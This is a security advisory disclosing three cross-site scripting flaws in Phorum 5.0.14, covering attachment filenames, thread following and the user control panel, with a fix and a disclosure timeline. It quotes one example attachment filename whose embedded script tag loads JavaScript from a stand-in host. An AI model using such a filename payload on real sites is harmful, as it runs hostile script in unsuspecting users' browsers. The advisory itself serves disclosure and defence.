|
Brought to you by:
Suppliers of:
|
|
|
| |
"Phorum is a web based message board written in PHP. Phorum is designed with high-availability and visitor ease of use in mind. Features such as mailing list integration, easy customization and simple installation make Phorum a powerful add-in to any website."
Three cross site scripting vulnerabilities have been found in Phorum. |
| |
Credit:
The information has been provided by Jon Oberheide.
|
| |
Vulnerable Systems:
* Phorum version 5.0.14
Immune Systems:
* Phorum version 5.0.15
Attachment Filename:
When posting a message in a thread, Phorum allows for file attachments of various types. When a user later views the thread containing the attachment, the filename is displayed. In file.php, the filename of the attachment is not sanitized before being output, leading to cross side scripting attack.
Posting of an attachment with a filename such as:
example<script language='Javascript' src='http://example.com/somethingbad.js'>.txt
will result in the execution of arbitrary JavaScript in an unsuspecting user's browser when they view the thread.
Following Threads:
While the subject line of a thread is sanitized correctly in the majority of places in Phorum, it is not in the follow.php file. When a user attempts to "follow" or subscribe to a thread with a malicious subject, the code will be executed.
User Control Panel:
The user's personal control panel has a module showing a list of currently "followed" threads. Similar to previous vulnerability, the thread subject line is not sanitized before this list is output.
Workaround:
The solution is to call PHP's htmlentities() on the filename/thread subject before it's output to the user's browser.
Disclosure Timeline:
* 20.02.05 - Attachment Filename vulnerability discovered and vendor notified.
* 21.02.05 - Version 5.0.14a released to resolve this issue.
* 22.02.05 - Rest of vulnerabilities discovered and vendor notified.
* 10.03.05 - Version 5.0.15 released resolving those issues.
* 12.03.05 - Public disclosure.
|
|
|
|
|
